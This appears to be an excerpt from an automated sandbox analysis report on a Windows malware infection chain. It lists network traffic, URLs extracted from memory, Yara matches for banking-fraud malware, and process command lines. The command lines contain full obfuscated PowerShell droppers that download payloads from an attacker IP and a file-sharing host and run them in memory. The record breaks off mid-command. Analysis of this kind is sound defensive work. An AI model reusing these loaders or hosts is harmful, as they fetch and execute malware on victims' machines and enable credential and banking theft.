79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36 30 25 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:50:50 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36 30 25 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:50:52 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36 30 25 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20
                    Source: powershell.exe, 00000001.00000002.1474974184.0000000007B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.155.254/
                    Source: powershell.exe, 00000001.00000002.1466721064.0000000005437000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.70.155.254/1150/creat
                    Source: powershell.exe, 00000001.00000002.1474974184.0000000007BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.155.254/1150/createabetterbuttersmoothsmoothykingstogetmesweeetness.tIF
                    Source: powershell.exe, 00000001.00000002.1474974184.0000000007BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.155.254/1150/createabetterbuttersmoothsmoothykingstogetmesweeetness.tIF6
                    Source: powershell.exe, 00000001.00000002.1474974184.0000000007B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.155.254/1150/createabetterbuttersmoothsmoothykingstogetmesweeetness.tIFC:
                    Source: powershell.exe, 00000001.00000002.1474974184.0000000007C0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.155.254/1150/createabetterbuttersmoothsmoothykingstogetmesweeetness.tIFLMEM
                    Source: powershell.exe, 00000001.00000002.1465577748.00000000035D1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1474974184.0000000007BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.155.254/1150/createabetterbuttersmoothsmoothykingstogetmesweeetness.tIFV
                    Source: powershell.exe, 00000001.00000002.1474974184.0000000007BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.155.254/1150/createabetterbuttersmoothsmoothykingstogetmesweeetness.tIFn
                    Source: powershell.exe, 00000001.00000002.1465577748.00000000035D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.155.254/1150/createabetterbuttersmoothsmoothykingstogetmesweeetness.tIFo
                    Source: powershell.exe, 00000003.00000002.1360997024.000000000710E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                    Source: powershell.exe, 0000000A.00000002.1724334596.0000000000EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microS
                    Source: powershell.exe, 0000000A.00000002.1791419832.000000000758D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftj
                    Source: powershell.exe, 0000000A.00000002.1791419832.000000000758D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftq
                    Source: powershell.exe, 0000000A.00000002.1724334596.0000000000EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mw
                    Source: powershell.exe, 00000003.00000002.1357523946.0000000005070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                    Source: powershell.exe, 00000001.00000002.1473011068.00000000060EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1359205631.0000000005BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1727066023.000000000603A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 0000000A.00000002.1727066023.0000000005128000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000003.00000002.1357523946.0000000004CE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 00000001.00000002.1466721064.0000000005081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1357523946.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2519242280.0000000004907000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1727066023.0000000004FD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000003.00000002.1357523946.0000000004CE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 0000000A.00000002.1727066023.0000000005128000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: TjxlUxenxgDChq.exe, 00000012.00000002.2573432013.0000000000E7C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.pegji.online
                    Source: TjxlUxenxgDChq.exe, 00000012.00000002.2573432013.0000000000E7C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.pegji.online/8c06/
                    Source: powershell.exe, 0000000A.00000002.1727066023.0000000005128000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://3105.filemail.com
                    Source: powershell.exe, 00000008.00000002.2519242280.0000000004C50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://3105.filemail.com/api/file/get?fileLR
                    Source: powershell.exe, 0000000A.00000002.1724334596.0000000000EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://3105.filemail.com/api/file/get?filek
                    Source: powershell.exe, 0000000A.00000002.1727066023.0000000005128000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNd
                    Source: cleanmgr.exe, 0000000F.00000003.2024689718.000000000819E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: powershell.exe, 00000001.00000002.1466721064.0000000005081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1357523946.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2519242280.0000000004907000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2519242280.0000000004918000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1727066023.0000000004FD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                    Source: powershell.exe, 00000003.00000002.1357523946.0000000004CE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                    Source: cleanmgr.exe, 0000000F.00000003.2024689718.000000000819E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: cleanmgr.exe, 0000000F.00000003.2024689718.000000000819E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: cleanmgr.exe, 0000000F.00000003.2024689718.000000000819E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: powershell.exe, 0000000A.00000002.1727066023.000000000603A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 0000000A.00000002.1727066023.000000000603A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 0000000A.00000002.1727066023.000000000603A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: cleanmgr.exe, 0000000F.00000003.2024689718.000000000819E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: cleanmgr.exe, 0000000F.00000003.2024689718.000000000819E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: cleanmgr.exe, 0000000F.00000003.2024689718.000000000819E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: cleanmgr.exe, 0000000F.00000002.2579593004.0000000005944000.00000004.10000000.00040000.00000000.sdmp, TjxlUxenxgDChq.exe, 00000012.00000002.2579590373.00000000030F4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2132405296.0000000021134000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://fzaqzjja.shop/15nb/?ozM=pHXpHpbXjHh&tHv=Hgx7D7c94bF86Gv92
                    Source: powershell.exe, 0000000A.00000002.1727066023.0000000005128000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000001.00000002.1466721064.0000000005899000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                    Source: cleanmgr.exe, 0000000F.00000002.2567427488.000000000324A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                    Source: cleanmgr.exe, 0000000F.00000002.2567427488.000000000324A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                    Source: cleanmgr.exe, 0000000F.00000003.2019012458.0000000008174000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                    Source: cleanmgr.exe, 0000000F.00000002.2567427488.000000000324A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2LMEM
                    Source: cleanmgr.exe, 0000000F.00000002.2567427488.000000000324A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                    Source: cleanmgr.exe, 0000000F.00000002.2567427488.000000000324A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                    Source: cleanmgr.exe, 0000000F.00000002.2567427488.000000000324A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                    Source: cleanmgr.exe, 0000000F.00000002.2567427488.000000000324A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                    Source: powershell.exe, 00000001.00000002.1473011068.00000000060EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1359205631.0000000005BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1727066023.000000000603A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: cleanmgr.exe, 0000000F.00000003.2024689718.000000000819E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: cleanmgr.exe, 0000000F.00000003.2024689718.000000000819E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: cleanmgr.exe, 0000000F.00000002.2579593004.0000000005DFA000.00000004.10000000.00040000.00000000.sdmp, TjxlUxenxgDChq.exe, 00000012.00000002.2579590373.00000000035AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.pegji.online/8c06/?tHv=G4zWZ0Nj9PVJ//SN6EOJwpki1UYI7dgFbJbLjGF7v5OX
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                    Source: unknownHTTPS traffic detected: 193.30.119.205:443 -> 192.168.2.9:49738 version: TLS 1.2

                    E-Banking Fraud

                    barindex
                    Source: Yara matchFile source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000F.00000002.2565803965.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2577427025.0000000003190000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2276568583.0000000005F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2567334619.00000000031C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1829585665.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.2573432013.0000000000E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2562192999.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1849072015.0000000001F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                    System Summary

                    barindex
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTem32\windOwsPoWeRshELl\v1.0\PowershELl.ExE" "PoWerSheLL.eXE -EX BypasS -noP -w 1 -C DEviceCrEDENTIALDEPLoYMEnt.EXe ; ieX($(iEX('[sySteM.TEXT.EnCOdIng]'+[CHAR]58+[chAR]0X3a+'UTF8.GetsTriNg([sysTem.ConVert]'+[CHaR]0X3A+[CHAr]0x3A+'fRombasE64sTRiNG('+[ChAR]0X22+'JGVZYlFRYlRxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRFZklOaXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRLYk1uT2lGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5ZkVqSG9vTHUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGeXNTUVRxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZ04pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImduS3dXQyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvWlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZVliUVFiVHE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDYuNzAuMTU1LjI1NC8xMTUwL2NyZWF0ZWFiZXR0ZXJidXR0ZXJzbW9vdGhzbW9vdGh5a2luZ3N0b2dldG1lc3dlZWV0bmVzcy50SUYiLCIkRW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMiLDAsMCk7c3RBclQtU0xFRXAoMyk7aWV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMi'+[chAr]34+'))')))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BypasS -noP -w 1 -C DEviceCrEDENTIALDEPLoYMEnt.EXe
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnT0pQaW1hZ2VVcmwgPSBHZEhodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxlaycrJ2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNCcrJ3RueGxBJysnVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGMnKyc5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBHJysnZEg7T0pQd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0JysnLldlYkNsaWVudDtPSicrJ1BpbWEnKydnZUJ5dGVzID0gT0pQd2ViQ2xpZW50LkRvd25sb2FkRGF0YShPSlBpbWFnZVVybCk7T0pQaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuYycrJ29kaW4nKydnXTo6VVRGOC5HZXRTdHJpbmcoT0pQaW1hZ2VCeXRlcyk7T0pQc3RhcnRGbGFnID0gR2RIPDxCQVNFNjRfU1RBUlQ+PkdkSDtPJysnSlBlbmRGbGFnID0gR2RIPDxCQVNFNjRfRU5EPj5HZEg7T0pQc3RhcnRJbmRleCA9IE9KUGltYWdlVGV4dC5JbicrJ2RleE9mKE9KUHN0YXJ0RmxhZyk7T0pQZW5kSW5kZXggPSBPSlBpbWFnZVRleHQuSW4nKydkZXhPZihPSlBlbmRGbGFnKTtPSlBzdGFydEluZGV4IC1nZSAwIC1hbmQgT0pQZW5kSW5kZXggLWd0JysnIE9KUHN0YXJ0SW5kZXg7T0pQc3RhcnRJbmRleCArPSBPSlBzdGFydEZsYWcuTGVuZ3RoO09KUGJhc2U2NExlbmd0aCA9IE9KUGVuZEluZGV4IC0gT0pQcycrJ3RhcnRJbmRleDtPSlBiYXNlNjRDb21tYW5kID0gJysnT0pQaW1hZ2VUZXh0LlN1YnN0cmluZyhPSlBzdGFydEluZGV4LCBPSlBiYXNlNjRMZW5ndGgpJysnO09KUGJhc2U2NFJldmVyc2VkID0gLWpvJysnaW4gKE9KUGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSByZVIgRm9yRWFjaC1PYmplY3QgeyBPSlBfIH0pWy0xLi4tKE9KUGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07T0pQY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhPSlBiYXNlNjRSZXZlcnNlZCk7T0pQbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKE9KUGNvbW0nKydhbmRCeXRlcyk7T0pQdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChHZEhWJysnQUlHZEgpO09KUHZhaU1lJysndGhvZC5JbnZva2UoT0pQbnVsbCwgQChHZEh0eHQuQU1NUkMvMDUxMS80NTIuNTUnKycxLjA3LjY0MS8vOnB0dGhHJysnZEgsICcrJ0dkSGRlc2F0aScrJ3ZhZG9HZEgsIEdkSGRlc2F0aXZhZG9HZEgsIEdkSGRlc2F0aXZhZG9HZEgsIEdkSGFzcG5ldF9jb21waWxlckdkSCwgR2RIZGVzYXRpdmFkb0dkSCwgR2RIZGVzYXRpdmFkb0dkSCxHZEhkZXNhdGl2YWRvR2RILEdkSGRlc2F0aXZhZG9HZEgsR2RIZGVzYXRpJysndmFkb0dkSCwnKydHZEhkZXNhdGl2YWRvR2RILEdkSGRlc2F0aXZhZG9HZEgsR2RIMUdkSCxHZEhkZXNhdGl2YWRvR2RIKSk7JyktY1JlcGxhQ2UgIChbQ0hhU